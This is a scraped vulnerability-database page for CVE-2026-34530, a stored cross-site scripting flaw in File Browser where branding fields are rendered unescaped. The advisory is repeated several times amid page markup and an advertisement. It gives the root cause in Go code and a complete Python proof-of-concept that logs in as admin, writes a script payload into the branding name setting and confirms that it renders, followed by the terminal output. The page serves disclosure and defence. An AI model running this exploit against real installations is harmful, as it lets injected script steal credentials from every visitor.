` tag and injects arbitrary script into every page load.\n\nAdditionally, when ReCaptcha is enabled, the `ReCaptchaHost` field is used as:\n```html\n<script src=\"[{[.ReCaptchaHost]}]/recaptcha/api.js\"></script>\n```\nThis allows loading arbitrary JavaScript from an admin-chosen origin.\n\nNo `Content-Security-Policy` header is set on the SPA entry point, so there is no CSP mitigation.\n\n\n<br/>\n\n### PoC\nBelow is the PoC python script that could be ran on test environment using docker compose:\n\n```yaml\nservices:\n\n filebrowser:\n image: filebrowser/filebrowser:v2.62.1\n user: 0:0\n ports:\n - \"80:80\"\n```\n\nAnd running this PoC python script:\n```python\nimport argparse\nimport json\nimport sys\nimport requests\n\n\nBANNER = \"\"\"\n Stored XSS via Branding Injection PoC\n Affected: filebrowser/filebrowser <=v2.62.1\n Root cause: http/static.go uses text/template (not html/template)\n Branding fields rendered unescaped into SPA index.html\n\"\"\"\n\nXSS_MARKER = \"XSS_BRANDING_POC_12345\"\nXSS

Agentic AI · Pentesting

Ready for Agentic Automated Testing?

Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.

Zero false positives

PoC for every finding

30+ tools orchestrated

Book a Demo Learn More

Setup in 5 minutesSOC 2 & ISO 27001

` breaks out of the `` tag and injects arbitrary script into every page load.\n\nAdditionally, when ReCaptcha is enabled, the `ReCaptchaHost` field is used as:\n```html\n<script src=\"[{[.ReCaptchaHost]}]/recaptcha/api.js\"></script>\n```\nThis allows loading arbitrary JavaScript from an admin-chosen origin.\n\nNo `Content-Security-Policy` header is set on the SPA entry point, so there is no CSP mitigation.\n\n\n<br/>\n\n### PoC\nBelow is the PoC python script that could be ran on test environment using docker compose:\n\n```yaml\nservices:\n\n filebrowser:\n image: filebrowser/filebrowser:v2.62.1\n user: 0:0\n ports:\n - \"80:80\"\n```\n\nAnd running this PoC python script:\n```python\nimport argparse\nimport json\nimport sys\nimport requests\n\n\nBANNER = \"\"\"\n Stored XSS via Branding Injection PoC\n Affected: filebrowser/filebrowser <=v2.62.1\n Root cause: http/static.go uses text/template (not html/template)\n Branding fields rendered unescaped into SPA index.html\n\"\"\"\n\nXSS_MARKER = \"XSS_BRANDING_POC_12345\"\nXSS_PAYLOAD = (\n ''\n)\n\n\ndef login(base: str, username: str, password: str) -> str:\n r = requests.post(f\"{base}/api/login\",\n json={\"username\": username, \"password\": password},\n timeout=10)\n if r.status_code != 200:\n print(f\" Login failed: {r.status_code}\")\n sys.exit(1)\n return r.text.strip('\"')\n\n\ndef main():\n sys.stdout.write(BANNER)\n sys.stdout.flush()\n\n ap = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"Stored XSS via branding injection PoC\",\n epilog=\"\"\"examples:\n %(prog)s -t http://localhost -u admin -p admin\n %(prog)s -t http://target.com/filebrowser -u admin -p secret\n\nhow it works:\n 1. Authenticates as admin to File Browser\n 2. Sets branding.name to a <script> payload via PUT /api/settings\n 3. Fetches the SPA index (unauthenticated) to verify the payload\n renders unescaped in the HTML <title> tag\n\nroot cause:\n http/static.go renders the SPA index.html using Go's text/template\n (NOT html/template) with custom delimiters [{[ and ]}].\n Branding fields like Name are inserted directly into HTML:\n <title>[{[.Name]}]\n No escaping is applied, so HTML/JS in the name breaks out of\n the tag and executes as script.\n\nimpact:\n Stored XSS affecting ALL visitors (including unauthenticated).\n An admin (or attacker who compromised admin) can inject persistent\n JavaScript that steals credentials from every user who visits.\"\"\",\n )\n\n ap.add_argument(\"-t\", \"--target\", required=True,\n help=\"Base URL of File Browser (e.g. http://localhost)\")\n ap.add_argument(\"-u\", \"--user\", required=True,\n help=\"Admin username\")\n ap.add_argument(\"-p\", \"--password\", required=True,\n help=\"Admin password\")\n if len(sys.argv) == 1:\n ap.print_help()\n sys.exit(1)\n args = ap.parse_args()\n\n base = args.target.rstrip(\"/\")\n hdrs = lambda tok: {\"X-Auth\": tok, \"Content-Type\": \"application/json\"}\n\n print()\n print(\"[*] ATTACK BEGINS...\")\n print(\"====================\")\n\n print(f\"\\n [1] Authenticating to {base}\")\n token = login(base, args.user, args.password)\n print(f\" Logged in as: {args.user}\")\n\n print(f\"\\n [2] Injecting XSS payload into branding.name\")\n r = requests.get(f\"{base}/api/settings\", headers=hdrs(token), timeout=10)\n if r.status_code != 200:\n print(f\" Failed: GET /api/settings returned {r.status_code}\")\n print(f\" (requires admin privileges)\")\n sys.exit(1)\n settings = r.json()\n settings[\"branding\"][\"name\"] = XSS_PAYLOAD\n r = requests.put(f\"{base}/api/settings\", headers=hdrs(token),\n json=settings, timeout=10)\n if r.status_code != 200:\n print(f\" Failed: PUT /api/settings returned {r.status_code}\")\n sys.exit(1)\n print(f\" Payload injected\")\n\n print(f\"\\n [3] Verifying XSS renders in unauthenticated SPA\")\n r = requests.get(f\"{base}/\", timeout=10)\n html = r.text\n\n if XSS_MARKER in html:\n print(f\" XSS payload found in HTML response!\")\n for line in html.split(\"\\n\"):\n if XSS_MARKER in line:\n print(f\" >>> {line.strip()[:120]}\")\n csp = r.headers.get(\"Content-Security-Policy\", \"\")\n if not csp:\n print(f\" No CSP header — script executes without restriction\")\n confirmed = True\n else:\n print(f\" Payload NOT found in HTML\")\n confirmed = False\n\n print()\n print(\"====================\")\n\n if confirmed:\n print()\n print(\"CONFIRMED: text/template renders branding.name without escaping.\")\n print(\"The <title> tag is broken and arbitrary <script> executes.\")\n print(\"Every visitor (authenticated or not) receives the payload.\")\n print()\n print(f\"Open {base}/ in a browser to see the alert() popup.\")\n else:\n print()\n print(\"NOT CONFIRMED in this test run.\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n```\n\nAnd terminal output:\n```bash\nroot@server205:~/sec-filebrowser# python3 poc_branding_xss.py -t http://localhost -u admin -p \"jhSR9z9pofv5evlX\"\n\n Stored XSS via Branding Injection PoC\n Affected: filebrowser/filebrowser <=v2.62.1\n Root cause: http/static.go uses text/template (not html/template)\n Branding fields rendered unescaped into SPA index.html\n\n[*] ATTACK BEGINS...\n====================\n\n [1] Authenticating to http://localhost\n Logged in as: admin\n\n [2] Injecting XSS payload into branding.name\n Payload injected\n\n [3] Verifying XSS renders in unauthenticated SPA\n XSS payload found in HTML response!\n >>> \n >>> window.FileBrowser = {\"AuthMethod\":\"json\",\"BaseURL\":\"\",\"CSS\":false,\"Color\":\"\",\"DisableExternal\":false,\"DisableUsedPercen\n No CSP header — script executes without restriction\n\n====================\n\nCONFIRMED: text/template renders branding.name without escaping.\nThe <title> tag is broken and arbitrary <script> executes.\nEvery visitor (authenticated or not) receives the payload.\n\nOpen http://localhost/ in a browser to see the alert() popup.\n\n```\n\n\n<br/>\n\n### Impact\n- Stored XSS affecting ALL visitors including unauthenticated users\n- Persistent backdoor — the payload survives until branding is manually changed","datePublished":"2026-04-01T08:27:54.093000","dateModified":"2026-04-01T10:25:35.596000","author":{"@type":"Organization","name":"Strobes Security","url":"https://strobes.co"},"publisher":{"@type":"Organization","name":"Strobes VI","url":"https://vi.strobes.co"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://vi.strobes.co/cve/CVE-2026-34530"},"about":{"@type":"Thing","name":"CVE-2026-34530","description":"Security vulnerability CVE-2026-34530 with CVSS score 0"},"keywords":["CVE-2026-34530","CVE","vulnerability","security","low","patch available"]}</script><script type="application/ld+json">{"@context":"https://schema.org","@type":"FAQPage","mainEntity":[{"@type":"Question","name":"What is CVE-2026-34530?","acceptedAnswer":{"@type":"Answer","text":"### Summary\nThe SPA index page in File Browser is vulnerable to Stored Cross-site Scripting (XSS) via admin-controlled branding fields. An admin who sets `branding.name` to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users.\n\n\n<br/>\n\n### Details\n`http/static.go` renders the SPA `index.html` using Go's `text/template` (NOT `html/template`) with custom delimiters `[{[` and `]}]`. Branding fields are inserted directly into HTML without any escaping:\n\n```go\n// http/static.go, line 16 — imports text/template instead of html/template\n\"text/template\"\n\n// http/static.go, line 33 — branding.Name passed into template data\n\"Name\": d.settings.Branding.Name,\n\n// http/static.go, line 97 — template parsed with custom delimiters, no escaping\nindex := template.Must(template.New(\"index\").Delims(\"[{[\", \"]}]\").Parse(string(fileContents)))\n```\n\nThe frontend template (`frontend/public/index.html`) embeds these fields directly:\n```html\n\n[{[ if .Name -]}][{[ .Name ]}][{[ else ]}]File Browser[{[ end ]}]\n\n\ncontent=\"[{[ if .Color -]}][{[ .Color ]}][{[ else ]}]#2979ff[{[ end ]}]\"\n```\n\nSince `text/template` performs NO HTML escaping (unlike `html/template`), setting `branding.name` to `` breaks out of the `` tag and injects arbitrary script into every page load.\n\nAdditionally, when ReCaptcha is enabled, the `ReCaptchaHost` field is used as:\n```html\n<script src=\"[{[.ReCaptchaHost]}]/recaptcha/api.js\"></script>\n```\nThis allows loading arbitrary JavaScript from an admin-chosen origin.\n\nNo `Content-Security-Policy` header is set on the SPA entry point, so there is no CSP mitigation.\n\n\n<br/>\n\n### PoC\nBelow is the PoC python script that could be ran on test environment using docker compose:\n\n```yaml\nservices:\n\n filebrowser:\n image: filebrowser/filebrowser:v2.62.1\n user: 0:0\n ports:\n - \"80:80\"\n```\n\nAnd running this PoC python script:\n```python\nimport argparse\nimport json\nimport sys\nimport requests\n\n\nBANNER = \"\"\"\n Stored XSS via Branding Injection PoC\n Affected: filebrowser/filebrowser <=v2.62.1\n Root cause: http/static.go uses text/template (not html/template)\n Branding fields rendered unescaped into SPA index.html\n\"\"\"\n\nXSS_MARKER = \"XSS_BRANDING_POC_12345\"\nXSS_PAYLOAD = (\n ''\n)\n\n\ndef login(base: str, username: str, password: str) -> str:\n r = requests.post(f\"{base}/api/login\",\n json={\"username\": username, \"password\": password},\n timeout=10)\n if r.status_code != 200:\n print(f\" Login failed: {r.status_code}\")\n sys.exit(1)\n return r.text.strip('\"')\n\n\ndef main():\n sys.stdout.write(BANNER)\n sys.stdout.flush()\n\n ap = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"Stored XSS via branding injection PoC\",\n epilog=\"\"\"examples:\n %(prog)s -t http://localhost -u admin -p admin\n %(prog)s -t http://target.com/filebrowser -u admin -p secret\n\nhow it works:\n 1. Authenticates as admin to File Browser\n 2. Sets branding.name to a <script> payload via PUT /api/settings\n 3. Fetches the SPA index (unauthenticated) to verify the payload\n renders unescaped in the HTML <title> tag\n\nroot cause:\n http/static.go renders the SPA index.html using Go's text/template\n (NOT html/template) with custom delimiters [{[ and ]}].\n Branding fields like Name are inserted directly into HTML:\n <title>[{[.Name]}]\n No escaping is applied, so HTML/JS in the name breaks out of\n the tag and executes as script.\n\nimpact:\n Stored XSS affecting ALL visitors (including unauthenticated).\n An admin (or attacker who compromised admin) can inject persistent\n JavaScript that steals credentials from every user who visits.\"\"\",\n )\n\n ap.add_argument(\"-t\", \"--target\", required=True,\n help=\"Base URL of File Browser (e.g. http://localhost)\")\n ap.add_argument(\"-u\", \"--user\", required=True,\n help=\"Admin username\")\n ap.add_argument(\"-p\", \"--password\", required=True,\n help=\"Admin password\")\n if len(sys.argv) == 1:\n ap.print_help()\n sys.exit(1)\n args = ap.parse_args()\n\n base = args.target.rstrip(\"/\")\n hdrs = lambda tok: {\"X-Auth\": tok, \"Content-Type\": \"application/json\"}\n\n print()\n print(\"[*] ATTACK BEGINS...\")\n print(\"====================\")\n\n print(f\"\\n [1] Authenticating to {base}\")\n token = login(base, args.user, args.password)\n print(f\" Logged in as: {args.user}\")\n\n print(f\"\\n [2] Injecting XSS payload into branding.name\")\n r = requests.get(f\"{base}/api/settings\", headers=hdrs(token), timeout=10)\n if r.status_code != 200:\n print(f\" Failed: GET /api/settings returned {r.status_code}\")\n print(f\" (requires admin privileges)\")\n sys.exit(1)\n settings = r.json()\n settings[\"branding\"][\"name\"] = XSS_PAYLOAD\n r = requests.put(f\"{base}/api/settings\", headers=hdrs(token),\n json=settings, timeout=10)\n if r.status_code != 200:\n print(f\" Failed: PUT /api/settings returned {r.status_code}\")\n sys.exit(1)\n print(f\" Payload injected\")\n\n print(f\"\\n [3] Verifying XSS renders in unauthenticated SPA\")\n r = requests.get(f\"{base}/\", timeout=10)\n html = r.text\n\n if XSS_MARKER in html:\n print(f\" XSS payload found in HTML response!\")\n for line in html.split(\"\\n\"):\n if XSS_MARKER in line:\n print(f\" >>> {line.strip()[:120]}\")\n csp = r.headers.get(\"Content-Security-Policy\", \"\")\n if not csp:\n print(f\" No CSP header — script executes without restriction\")\n confirmed = True\n else:\n print(f\" Payload NOT found in HTML\")\n confirmed = False\n\n print()\n print(\"====================\")\n\n if confirmed:\n print()\n print(\"CONFIRMED: text/template renders branding.name without escaping.\")\n print(\"The <title> tag is broken and arbitrary <script> executes.\")\n print(\"Every visitor (authenticated or not) receives the payload.\")\n print()\n print(f\"Open {base}/ in a browser to see the alert() popup.\")\n else:\n print()\n print(\"NOT CONFIRMED in this test run.\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n```\n\nAnd terminal output:\n```bash\nroot@server205:~/sec-filebrowser# python3 poc_branding_xss.py -t http://localhost -u admin -p \"jhSR9z9pofv5evlX\"\n\n Stored XSS via Branding Injection PoC\n Affected: filebrowser/filebrowser <=v2.62.1\n Root cause: http/static.go uses text/template (not html/template)\n Branding fields rendered unescaped into SPA index.html\n\n[*] ATTACK BEGINS...\n====================\n\n [1] Authenticating to http://localhost\n Logged in as: admin\n\n [2] Injecting XSS payload into branding.name\n Payload injected\n\n [3] Verifying XSS renders in unauthenticated SPA\n XSS payload found in HTML response!\n >>> \n >>> window.FileBrowser = {\"AuthMethod\":\"json\",\"BaseURL\":\"\",\"CSS\":false,\"Color\":\"\",\"DisableExternal\":false,\"DisableUsedPercen\n No CSP header — script executes without restriction\n\n====================\n\nCONFIRMED: text/template renders branding.name without escaping.\nThe <title> tag is broken and arbitrary <script> executes.\nEvery visitor (authenticated or not) receives the payload.\n\nOpen http://localhost/ in a browser to see the alert() popup.\n\n```\n\n\n<br/>\n\n### Impact\n- Stored XSS affecting ALL visitors including unauthenticated users\n- Persistent backdoor — the payload survives until branding is manually changed"}},{"@type":"Question","name":"What is the severity of CVE-2026-34530?","acceptedAnswer":{"@type":"Answer","text":"CVE-2026-34530 has a CVSS v3 score of 0, which is classified as Low severity."}},{"@type":"Question","name":"Is there an exploit available for CVE-2026-34530?","acceptedAnswer":{"@type":"Answer","text":"No known public exploits are currently available for CVE-2026-34530."}},{"@type":"Question","name":"Is there a patch available for CVE-2026-34530?","acceptedAnswer":{"@type":"Answer","text":"Yes, patches are available for CVE-2026-34530. Check the vendor advisories for update instructions."}}]}</script><script type="application/ld+json">{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://vi.strobes.co"},{"@type":"ListItem","position":2,"name":"CVE Database","item":"https://vi.strobes.co/explore"},{"@type":"ListItem","position":3,"name":"CVE-2026-34530","item":"https://vi.strobes.co/cve/CVE-2026-34530"}]}</script><div class="container mx-auto px-4 py-8"><nav class="flex items-center gap-2 text-sm text-muted-foreground mb-6"><a class="hover:text-foreground transition-colors" href="/vi/">Home</a><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-right h-4 w-4" aria-hidden="true"><path d="m9 18 6-6-6-6"></path></svg><a class="hover:text-foreground transition-colors" href="/vi/explore/">CVEs</a><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-right h-4 w-4" aria-hidden="true"><path d="m9 18 6-6-6-6"></path></svg><span class="text-foreground">CVE-2026-34530</span></nav><div class="mb-8"><div class="flex flex-col md:flex-row md:items-center md:justify-between gap-4"><div><h1 class="text-3xl font-bold">CVE-2026-34530</h1><div class="flex flex-col sm:flex-row sm:items-center gap-2 sm:gap-4 mt-2"><div class="flex items-center gap-4 text-sm text-muted-foreground"><span>Published: April 1, 2026</span></div><div class="flex items-center gap-2 text-sm text-muted-foreground "><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-clock h-4 w-4" aria-hidden="true"><path d="M12 6v6l4 2"></path><circle cx="12" cy="12" r="10"></circle></svg><span>Last updated:</span><time dateTime="2026-04-01T10:25:35.596Z" title="April 1, 2026"><span class="font-medium">15 hours ago</span><span class="hidden sm:inline"> (April 1, 2026)</span></time></div></div></div><div class="flex items-center gap-2" style="opacity:0;transform:translateY(-10px)"><div tabindex="0"><button data-slot="button" class="inline-flex items-center justify-center whitespace-nowrap text-sm font-medium transition-all disabled:pointer-events-none disabled:opacity-50 [&_svg]:pointer-events-none [&_svg:not([class*='size-'])]:size-4 shrink-0 [&_svg]:shrink-0 outline-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive border bg-background shadow-xs hover:bg-accent hover:text-accent-foreground dark:bg-input/30 dark:border-input dark:hover:bg-input/50 h-8 rounded-md gap-1.5 px-3 has-[>svg]:px-2.5"><span class="flex items-center" style="opacity:0;transform:scale(0.8)"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-copy h-4 w-4 mr-2" aria-hidden="true"><rect width="14" height="14" x="8" y="8" rx="2" ry="2"></rect><path d="M4 16c-1.1 0-2-.9-2-2V4c0-1.1.9-2 2-2h10c1.1 0 2 .9 2 2"></path></svg>Copy Link</span></button></div><div type="button" id="radix-_R_1aainpfiuj6ivb_" aria-haspopup="menu" aria-expanded="false" data-state="closed" tabindex="0"><button data-slot="button" class="inline-flex items-center justify-center whitespace-nowrap text-sm font-medium transition-all disabled:pointer-events-none disabled:opacity-50 [&_svg]:pointer-events-none [&_svg:not([class*='size-'])]:size-4 shrink-0 [&_svg]:shrink-0 outline-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive border bg-background shadow-xs hover:bg-accent hover:text-accent-foreground dark:bg-input/30 dark:border-input dark:hover:bg-input/50 h-8 rounded-md gap-1.5 px-3 has-[>svg]:px-2.5"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-share2 lucide-share-2 h-4 w-4 mr-2" aria-hidden="true"><circle cx="18" cy="5" r="3"></circle><circle cx="6" cy="12" r="3"></circle><circle cx="18" cy="19" r="3"></circle><line x1="8.59" x2="15.42" y1="13.51" y2="17.49"></line><line x1="15.41" x2="8.59" y1="6.51" y2="10.49"></line></svg>Share</button></div></div></div><div class="flex flex-wrap gap-2 mt-4"><span data-slot="badge" class="inline-flex items-center justify-center rounded-md border px-2 py-0.5 text-xs font-medium w-fit whitespace-nowrap shrink-0 [&>svg]:size-3 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-secondary text-secondary-foreground [a&]:hover:bg-secondary/90 gap-1"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-bug h-3 w-3" aria-hidden="true"><path d="M12 20v-9"></path><path d="M14 7a4 4 0 0 1 4 4v3a6 6 0 0 1-12 0v-3a4 4 0 0 1 4-4z"></path><path d="M14.12 3.88 16 2"></path><path d="M21 21a4 4 0 0 0-3.81-4"></path><path d="M21 5a4 4 0 0 1-3.55 3.97"></path><path d="M22 13h-4"></path><path d="M3 21a4 4 0 0 1 3.81-4"></path><path d="M3 5a4 4 0 0 0 3.55 3.97"></path><path d="M6 13H2"></path><path d="m8 2 1.88 1.88"></path><path d="M9 7.13V6a3 3 0 1 1 6 0v1.13"></path></svg>Exploit: No</span><span data-slot="badge" class="inline-flex items-center justify-center rounded-md border px-2 py-0.5 text-xs font-medium w-fit whitespace-nowrap shrink-0 [&>svg]:size-3 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-secondary text-secondary-foreground [a&]:hover:bg-secondary/90 gap-1"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-zap h-3 w-3" aria-hidden="true"><template id="P:4"></template></svg>Zero-day: No</span><template id="P:5"></template><template id="P:6"></template></div></div><template id="P:7"></template><template id="P:8"></template><template id="P:9"></template></div></div><script>$RS=function(a,b){a=document.getElementById(a);b=document.getElementById(b);for(a.parentNode.removeChild(a);a.firstChild;)b.parentNode.insertBefore(a.firstChild,b);b.parentNode.removeChild(b)};$RS("S:2","P:2")</script><svg aria-hidden="true" style="display:none" id="S:4"><path d="M4 14a1 1 0 0 1-.78-1.63l9.9-10.2a.5.5 0 0 1 .86.46l-1.92 6.02A1 1 0 0 0 13 10h7a1 1 0 0 1 .78 1.63l-9.9 10.2a.5.5 0 0 1-.86-.46l1.92-6.02A1 1 0 0 0 11 14z"></path></svg><script>$RS("S:4","P:4")</script><div hidden id="S:5"><span data-slot="badge" class="inline-flex items-center justify-center rounded-md border px-2 py-0.5 text-xs font-medium w-fit whitespace-nowrap shrink-0 [&>svg]:size-3 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-destructive text-white [a&]:hover:bg-destructive/90 focus-visible:ring-destructive/20 dark:focus-visible:ring-destructive/40 dark:bg-destructive/60 gap-1"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-circle-check h-3 w-3" aria-hidden="true"><circle cx="12" cy="12" r="10"></circle><path d="m9 12 2 2 4-4"></path></svg>Patch: Yes</span></div><script>$RS("S:5","P:5")</script><div hidden id="S:6"><span data-slot="badge" class="inline-flex items-center justify-center rounded-md border px-2 py-0.5 text-xs font-medium w-fit whitespace-nowrap shrink-0 [&>svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent text-primary-foreground [a&]:hover:bg-primary/90 bg-purple-500">Trend: Neutral</span></div><script>$RS("S:6","P:6")</script><div hidden id="S:7"><div class="mb-8"><div data-slot="card" class="text-card-foreground flex flex-col gap-6 rounded-xl py-6 shadow-sm bg-blue-500/10 border-blue-500/20 border"><div data-slot="card-content" class="p-5"><div class="flex items-center justify-between mb-4"><div class="flex items-center gap-2"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-circle-check h-5 w-5 text-blue-500" aria-hidden="true"><circle cx="12" cy="12" r="10"></circle><path d="m9 12 2 2 4-4"></path></svg><span class="font-semibold text-sm uppercase tracking-wide">TL;DR</span></div><div class="flex items-center gap-1.5 text-xs text-muted-foreground"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-clock h-3 w-3" aria-hidden="true"><path d="M12 6v6l4 2"></path><circle cx="12" cy="12" r="10"></circle></svg><time dateTime="2026-04-01T10:25:35.596000">Updated April 1, 2026</time></div></div><p class="text-sm leading-relaxed mb-4">CVE-2026-34530 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.</p><div class="space-y-2"><span class="text-xs font-medium text-muted-foreground uppercase tracking-wide">Key Points</span><ul class="space-y-1.5"><li class="flex items-start gap-2 text-sm"><span data-slot="badge" class="border font-medium whitespace-nowrap [&>svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-secondary text-secondary-foreground [a&]:hover:bg-secondary/90 h-5 w-5 rounded-full p-0 flex items-center justify-center text-[10px] shrink-0 mt-0.5">1</span><span>Low severity (CVSS 0.0/10)</span></li><li class="flex items-start gap-2 text-sm"><span data-slot="badge" class="border font-medium whitespace-nowrap [&>svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-secondary text-secondary-foreground [a&]:hover:bg-secondary/90 h-5 w-5 rounded-full p-0 flex items-center justify-center text-[10px] shrink-0 mt-0.5">2</span><span>No known public exploits</span></li><li class="flex items-start gap-2 text-sm"><span data-slot="badge" class="border font-medium whitespace-nowrap [&>svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-secondary text-secondary-foreground [a&]:hover:bg-secondary/90 h-5 w-5 rounded-full p-0 flex items-center justify-center text-[10px] shrink-0 mt-0.5">3</span><span>Vendor patches are available</span></li></ul></div><div class="mt-4 pt-4 border-t border-current/10"><a href="https://strobes.co/lp/agentic-pentesting" target="_blank" rel="noopener noreferrer" class="group flex items-center gap-3 p-3 rounded-lg bg-white/[0.06] hover:bg-white/[0.1] border border-white/[0.06] hover:border-primary/30 transition-all"><div class="p-2 rounded-lg bg-primary/15 shrink-0"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-bot h-4 w-4 text-primary" aria-hidden="true"><path d="M12 8V4H8"></path><rect width="16" height="12" x="4" y="8" rx="2"></rect><path d="M2 14h2"></path><path d="M20 14h2"></path><path d="M15 13v2"></path><path d="M9 13v2"></path></svg></div><div class="flex-1 min-w-0"><p class="text-sm font-semibold">Test this CVE with Agentic AI</p><p class="text-xs text-muted-foreground">Deploy autonomous AI agents to validate this vulnerability in your environment.</p></div><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-arrow-right h-4 w-4 text-muted-foreground group-hover:text-primary group-hover:translate-x-0.5 transition-all shrink-0" aria-hidden="true"><path d="M5 12h14"></path><path d="m12 5 7 7-7 7"></path></svg></a></div></div></div></div></div><script>$RS("S:7","P:7")</script><div hidden id="S:8"><div class="grid grid-cols-1 lg:grid-cols-3 gap-6"><div class="lg:col-span-2 space-y-6"><div data-slot="card" class="bg-card text-card-foreground flex flex-col gap-6 rounded-xl border py-6 shadow-sm"><div data-slot="card-header" class="@container/card-header grid auto-rows-min grid-rows-[auto_auto] items-start gap-1.5 px-6 has-data-[slot=card-action]:grid-cols-[1fr_auto] [.border-b]:pb-6"><div data-slot="card-title" class="leading-none font-semibold flex items-center gap-2"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-shield h-5 w-5" aria-hidden="true"><path d="M20 13c0 5-3.5 7.5-7.66 8.95a1 1 0 0 1-.67-.01C7.5 20.5 4 18 4 13V6a1 1 0 0 1 1-1c2 0 4.5-1.2 6.24-2.72a1.17 1.17 0 0 1 1.52 0C14.51 3.81 17 5 19 5a1 1 0 0 1 1 1z"></path></svg>Severity Scores</div></div><div data-slot="card-content" class="px-6 space-y-4"><div class="space-y-2"><div class="flex justify-between text-sm"><span class="text-muted-foreground">CVSS v3</span><span class="font-semibold text-green-500">0.0</span></div><div class="h-2 bg-muted rounded-full overflow-hidden"><div class="h-full rounded-full transition-all bg-green-500" style="width:0%"></div></div></div><div class="space-y-2"><div class="flex justify-between text-sm"><span class="text-muted-foreground">CVSS v2</span><span class="font-semibold text-green-500">0.0</span></div><div class="h-2 bg-muted rounded-full overflow-hidden"><div class="h-full rounded-full transition-all bg-green-500" style="width:0%"></div></div></div><div class="space-y-2"><div class="flex justify-between text-sm"><span class="text-muted-foreground">Priority Score</span><span class="font-semibold text-green-500">0.0</span></div><div class="h-2 bg-muted rounded-full overflow-hidden"><div class="h-full rounded-full transition-all bg-green-500" style="width:0%"></div></div></div><div class="space-y-2"><div class="flex justify-between text-sm"><span class="text-muted-foreground">EPSS Score</span><span class="font-semibold 